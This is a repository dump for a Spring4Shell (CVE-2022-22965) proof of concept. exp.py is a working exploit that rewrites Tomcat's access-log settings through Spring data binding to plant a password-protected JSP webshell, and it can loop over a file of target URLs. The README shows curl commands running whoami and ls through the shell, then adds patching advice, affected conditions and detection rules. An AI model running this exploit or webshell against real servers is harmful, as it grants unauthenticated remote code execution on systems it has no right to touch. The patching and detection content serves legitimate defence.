├── README.md
├── Vulnerability Analysis [CHINESE].pdf
├── Vulnerability Analysis [ENGLISH].pdf
├── exp.py
└── images
    ├── img_1.png
    └── poc.png

/README.md:
--------------------------------------------------------------------------------
# Spring Core RCE - CVE-2022-22965

> After the Spring Cloud Function vulnerability, on March 29 another heavyweight Spring vulnerability broke out on the Internet: Spring Core RCE.
>
> On March 31 Spring released new versions which fix the vulnerability. See section [Patching](#patching).
>
> On March 31 a [CVE number was finally assigned to the vulnerability](https://tanzu.vmware.com/security/cve-2022-22965) with a [CVSS score of 9.8 (CRITICAL)](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

## Proof-of-Concept
The exploit is a single unauthenticated HTTP request that ends in code execution, which is why the CVSS vector (network, low complexity, no privileges, no user interaction, high impact on confidentiality, integrity and availability) comes out at 9.8.

To test the vulnerability you can do the following.

Start a vulnerable docker image of Spring.
```sh
docker run -d -p 8082:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29
```

This binds the vulnerable Spring to the address `localhost:8082`.

Verify the image is started correctly with `curl`
```sh
curl http://localhost:8082
```

A response of `ok` should be returned.

Let's exploit the vulnerable image now!

```sh
python3 exp.py --url http://localhost:8082
```

A response of `The vulnerability exists ....` should be returned.

What `exp.py` does: it sends one POST whose parameter names walk from the bound request object through `class.module.classLoader.resources.context.parent.pipeline.first` to Tomcat's `AccessLogValve`, and sets that valve's `directory`, `prefix`, `suffix`, `fileDateFormat` and `pattern`. The access log is thereby relocated to `webapps/ROOT/tomcatwar.jsp`, and its line format is a JSP webshell, so Tomcat writes the shell to disk and serves it from the ROOT context. See the analysis PDFs in this repository for the full property chain.
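As an added example (not part of this repository or of the circulating PoC), the following script reconstructs the form body `exp.py` posts from its parts and simulates how Tomcat's `AccessLogValve` expands `%{name}i` header references when it appends a log line. It shows why the JSP delimiters travel in the `c1`/`c2`/`suffix` headers rather than in the body, why `fileDateFormat` is emptied, and what ends up in `tomcatwar.jsp` after the exploit POST and after a plain `curl` that carries none of those headers. The `%{name}i` expansion is a simplified model of the valve (only that pattern element is handled, and header lookup is case-sensitive here, which real Tomcat is not); nothing is sent over the network.

```python
import re
from urllib.parse import parse_qs, urlencode

# Property path from the bound bean to Tomcat's AccessLogValve (same as exp.py):
# class -> module -> classLoader -> resources -> context -> parent -> pipeline -> first
PREFIX = "class.module.classLoader.resources.context.parent.pipeline.first."

# Headers exp.py sends. The JSP delimiters and the word "Runtime" are referenced
# from the pattern as %{name}i instead of being written into the form body.
EXPLOIT_HEADERS = {"suffix": "%>//", "c1": "Runtime", "c2": "<%"}

# The access-log pattern, i.e. the future JSP source (exp.py's payload, URL-decoded).
JSP_PATTERN = (
    '%{c2}i if("j".equals(request.getParameter("pwd"))){ '
    'java.io.InputStream in = %{c1}i.getRuntime()'
    '.exec(request.getParameter("cmd")).getInputStream(); '
    'int a = -1; byte[] b = new byte[2048]; '
    'while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i'
)


def build_form(pattern=JSP_PATTERN, prefix="tomcatwar", directory="webapps/ROOT"):
    """The five AccessLogValve properties exp.py sets, before URL-encoding."""
    return {
        PREFIX + "pattern": pattern,
        PREFIX + "suffix": ".jsp",
        PREFIX + "directory": directory,  # resolved relative to $CATALINA_BASE
        PREFIX + "prefix": prefix,
        PREFIX + "fileDateFormat": "",    # empty -> no date stamp in the file name
    }


def encode_form(fields):
    """Form body as a client sends it; '%' in the pattern becomes '%25', as in exp.py."""
    return urlencode(fields)


def decode_form(body):
    """What server-side form decoding hands to Spring's data binder."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def log_file_path(fields):
    """Tomcat names the log file directory/prefix + dateStamp + suffix."""
    return "{}/{}{}{}".format(
        fields[PREFIX + "directory"], fields[PREFIX + "prefix"],
        fields[PREFIX + "fileDateFormat"], fields[PREFIX + "suffix"])


_HEADER_REF = re.compile(r"%\{([^}]+)\}i")


def render_log_line(pattern, request_headers):
    """Simplified AccessLogValve model: %{name}i becomes the value of request
    header 'name', or '-' when the request did not carry that header."""
    return _HEADER_REF.sub(lambda m: request_headers.get(m.group(1), "-"), pattern)


def jsp_after_requests(fields, header_sets):
    """File content after Tomcat appended one log line per request."""
    return "\n".join(render_log_line(fields[PREFIX + "pattern"], h) for h in header_sets)


if __name__ == "__main__":
    fields = build_form()
    print("POST body :", encode_form(fields)[:90] + "...")
    print("log file  :", log_file_path(fields))
    # Line 1 is the exploit POST itself (it carries the headers); line 2 is a
    # plain curl to the shell, which carries none of them.
    print(jsp_after_requests(fields, [EXPLOIT_HEADERS, {}]))
```

The second rendered line, with `-` where the headers would have been, is exactly the text that shows up below the command output in the `curl` transcript in the next section: every request to the shell appends another such line, and because it sits outside any `<% %>` scriptlet the JSP prints it verbatim.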
You can now exploit the vulnerability with `curl`. Quote the URL: an unquoted `&` makes the shell background the command and drop the `cmd` parameter.
```sh
# Execute command whoami
curl --output - 'http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=whoami'

# Response has been truncated
root

//
- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } - ........

# Execute command ls
curl --output - 'http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=ls'

# Response has been truncated
app
bin
dev
etc
..........
```

The text after the command output is not an error. `tomcatwar.jsp` is Tomcat's access log, so every request, including each `curl` to the shell, appends one more line rendered from the injected pattern. A request without the `c1`, `c2` and `suffix` headers gets `-` in place of each header value, which leaves the Java code outside any `<% ... %>` scriptlet, and the JSP prints it as template text. The file grows with every hit, which also makes it easy to spot on disk.

## Circulating coding poc
The PoC circulating publicly (screenshot below) has been uploaded to this repository as `exp.py`.
![Circulating coding poc ](images/poc.png)
![awkward situation ](images/img_1.png)

## Patching
Spring have now released new versions which address this CVE: Spring Framework 5.3.18 and 5.2.20 (picked up by Spring Boot 2.6.6 and 2.5.12). See [Springs announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement).

[The commit that patched the vulnerability](https://github.com/spring-projects/spring-framework/commit/7f7fb58dd0dae86d22268a4b59ac7c72a6c22529) tightens the property filtering in `CachedIntrospectionResults` so that only `name` (and `*Name`) properties are exposed on `Class`, and properties of type `ClassLoader` or `ProtectionDomain` are never exposed to data binding. This closes the whole `class.module.classLoader` path, not just the one parameter chain used by `exp.py`.

## Vulnerability Impact
The exploit in this repository requires all of the following (the conditions listed in Spring's announcement):
1. JDK version 9 and above. Spring has blocked the `class.classLoader` property since CVE-2010-1622; `Class.getModule()` only exists from JDK 9, and `class.module.classLoader` reaches the same class loader through it.
2. Spring Framework or derived frameworks are used (Spring MVC or Spring WebFlux, binding request parameters to a non-primitive object), version 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, or older.
3. Apache Tomcat as the servlet container, with the application deployed as a traditional WAR. A Spring Boot executable jar with embedded Tomcat is not affected by this exploit, because the application class loader is then not Tomcat's `WebappClassLoader` and the `classLoader.resources` hop does not exist.

Spring stresses that the underlying data-binding problem is more general than this exploit, so patch even if one of the conditions is not met.

## Bug fix suggestion
This section predates the fix; the real remedy is to upgrade to the patched versions in the [Patching](#patching) section. If an upgrade cannot be done immediately, the workarounds published by Spring are to downgrade to JDK 8, or to register a `@ControllerAdvice` with an `@InitBinder` method that calls `WebDataBinder.setDisallowedFields("class.*", "Class.*", "*.class.*", "*.Class.*")` on every binder. The second workaround does not cover controllers that configure their own disallowed fields locally and thereby override the global setting, which is why it is only a stopgap.

## Blue team
### Yara
* [Florian Roth - Spring4Shell webshells](https://github.com/Neo23x0/signature-base/blob/master/yara/expl_spring4shell.yar)

### Sigma
* [Emanuele De Lucia - Creation of .jsp webshells](https://github.com/edelucia/rules/blob/main/sigma/Spring4Shell.yaml)

### SPLUNK
* [Alex John - Splunk detection SPL](https://github.com/west-wind/Spring4Shell-Detection)

--------------------------------------------------------------------------------
/Vulnerability Analysis [CHINESE].pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TheGejr/SpringShell/3a7f1ea03dc62fb0b048333c50c75723262ec2f8/Vulnerability Analysis [CHINESE].pdf
--------------------------------------------------------------------------------
/Vulnerability Analysis [ENGLISH].pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TheGejr/SpringShell/3a7f1ea03dc62fb0b048333c50c75723262ec2f8/Vulnerability Analysis [ENGLISH].pdf
--------------------------------------------------------------------------------
/exp.py:
--------------------------------------------------------------------------------
```python
#coding:utf-8
# Spring Core RCE (CVE-2022-22965) PoC.
# One POST reaches Tomcat's AccessLogValve through Spring data binding
# (class.module.classLoader.resources.context.parent.pipeline.first.*) and
# reconfigures it so the access log is written as webapps/ROOT/tomcatwar.jsp
# with a log pattern that is a JSP webshell.

import argparse
from urllib.parse import urljoin

import requests
import urllib3

urllib3.disable_warnings()  # verify=False below would otherwise warn on every request


def Exploit(url):
    # The JSP delimiters and the word "Runtime" travel as request headers and are
    # referenced from the log pattern as %{c2}i / %{c1}i / %{suffix}i, so the form
    # body itself never contains "<%" or "%>".
    headers = {"suffix": "%>//",
               "c1": "Runtime",
               "c2": "<%",
               "DNT": "1",
               "Content-Type": "application/x-www-form-urlencoded"
               }
    # pattern        -> access-log line format; URL-decoded, it is the webshell source
    # suffix/prefix  -> file name tomcatwar.jsp
    # directory      -> webapps/ROOT (relative to $CATALINA_BASE), so Tomcat serves the file
    # fileDateFormat -> emptied, so no date stamp is inserted into the file name
    data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
    try:
        # Tomcat rotates the log because the date stamp changed, so normally the
        # POST itself is the first line written into the new file.
        requests.post(url, headers=headers, data=data, timeout=15,
                      allow_redirects=False, verify=False)
        shellurl = urljoin(url, 'tomcatwar.jsp')
        shellgo = requests.get(shellurl, timeout=15, allow_redirects=False, verify=False)
        # Only the status code is checked: a catch-all route that answers 200 on any
        # path gives a false positive, so confirm with ?pwd=j&cmd=... before reporting.
        if shellgo.status_code == 200:
            print(f"The vulnerability exists, the shell address is :{shellurl}?pwd=j&cmd=whoami")
            return True
    except Exception as e:
        print(e)
    return False


def main():
    parser = argparse.ArgumentParser(description='Spring-Core Rce.')
    parser.add_argument('--file', help='url file', required=False)
    parser.add_argument('--url', help='target url', required=False)
    args = parser.parse_args()
    if not (args.url or args.file):
        parser.error('give --url or --file')
    if args.url:
        Exploit(args.url)
    if args.file:
        with open(args.file) as f:
            for line in f:
                target = line.strip()
                if target and not target.startswith('#'):  # skip blank and commented lines
                    Exploit(target)


if __name__ == '__main__':
    main()
```
--------------------------------------------------------------------------------
/images/img_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TheGejr/SpringShell/3a7f1ea03dc62fb0b048333c50c75723262ec2f8/images/img_1.png
--------------------------------------------------------------------------------
/images/poc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TheGejr/SpringShell/3a7f1ea03dc62fb0b048333c50c75723262ec2f8/images/poc.png
--------------------------------------------------------------------------------
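As an added example that is not part of this repository (nor of the Yara, Sigma or Splunk rule sets linked in the Blue team section of the README), the following Python implements two detections for the technique `exp.py` uses and runs them over constructed sample data. The request-side check flags query strings or form bodies whose parameter names walk into the class loader (`class.module.classLoader...`, or the older `class.classLoader` spelling), and additionally flags the two properties that turn the access log into a served JSP. The file-side check flags `.jsp` content that carries a command-execution call inside a scriptlet, which is what Tomcat ends up writing. The request records, the JSP contents and the indicator names are constructed for this example, not taken from any real system or product.

```python
import re
from urllib.parse import parse_qs

# Parameter names that walk from a bound bean into its ClassLoader. The JDK 9+
# "module" hop is the one CVE-2022-22965 uses; the direct class.classLoader
# spelling has been blocked by Spring since CVE-2010-1622 but is flagged too.
CLASSLOADER_PATH = re.compile(r"(^|\.)class\.(module\.)?classloader\.", re.IGNORECASE)

# Command-execution primitives worth flagging inside a JSP scriptlet.
EXEC_MARKERS = (
    re.compile(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\("),
    re.compile(r"new\s+ProcessBuilder\s*\("),
)


def scan_params(encoded):
    """Findings for one query string or form body: list of (indicator, detail)."""
    findings = []
    params = parse_qs(encoded, keep_blank_values=True)
    hits = sorted(n for n in params if CLASSLOADER_PATH.search(n))
    if hits:
        findings.append(("classloader-property-write", hits))
    for name, values in params.items():
        tail = name.lower()
        # The AccessLogValve pattern is turned into JSP by pulling "<%" etc. from headers.
        if tail.endswith("pipeline.first.pattern") and any("%{" in v for v in values):
            findings.append(("accesslog-pattern-with-header-refs", values[0]))
        if tail.endswith("pipeline.first.suffix") and any(v.lower().endswith(".jsp") for v in values):
            findings.append(("accesslog-suffix-jsp", values[0]))
    return findings


def scan_request(req):
    """Findings for one request record; Spring binds query and body parameters alike."""
    findings = []
    for encoded in (req.get("query", ""), req.get("body", "")):
        if encoded:
            findings.extend(scan_params(encoded))
    return findings


def scan_jsp(source):
    """True if any <% ... %> scriptlet in a JSP contains a command-execution call."""
    for scriptlet in re.findall(r"<%(.*?)%>", source, re.DOTALL):
        if any(m.search(scriptlet) for m in EXEC_MARKERS):
            return True
    return False


# Constructed sample data (not captured from any real system).
EXPLOIT_BODY = (
    "class.module.classLoader.resources.context.parent.pipeline.first.pattern="
    "%25%7Bc2%7Di+if(1)%7B%7D+%25%7Bsuffix%7Di"
    "&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp"
    "&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT"
    "&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar"
    "&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
)
SAMPLE_REQUESTS = [
    {"method": "GET", "path": "/", "query": "", "body": ""},
    {"method": "POST", "path": "/", "query": "", "body": EXPLOIT_BODY},
    {"method": "GET", "path": "/", "query": EXPLOIT_BODY, "body": ""},   # same payload via query string
    {"method": "GET", "path": "/tomcatwar.jsp", "query": "pwd=j&cmd=whoami", "body": ""},
    {"method": "POST", "path": "/login", "query": "", "body": "username=alice&password=hunter2"},
]
SAMPLE_JSP = (
    '<% if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = '
    'Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); '
    'int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ '
    'out.println(new String(b)); } } %>//\n'
    '- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime()... -\n'
)
BENIGN_JSP = '<%@ page contentType="text/html" %><html><body><%= new java.util.Date() %></body></html>'


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req["method"], req["path"], scan_request(req) or "clean")
    print("webshell.jsp :", scan_jsp(SAMPLE_JSP))
    print("index.jsp    :", scan_jsp(BENIGN_JSP))
```

Note what the request-side rules do not see: the later `GET /tomcatwar.jsp?pwd=j&cmd=whoami` is an ordinary request to a JSP and produces no finding, so once the shell exists you need the file-side check (or a rule on `.jsp` file creation under `webapps`, as in the linked Sigma rule) rather than request inspection alone.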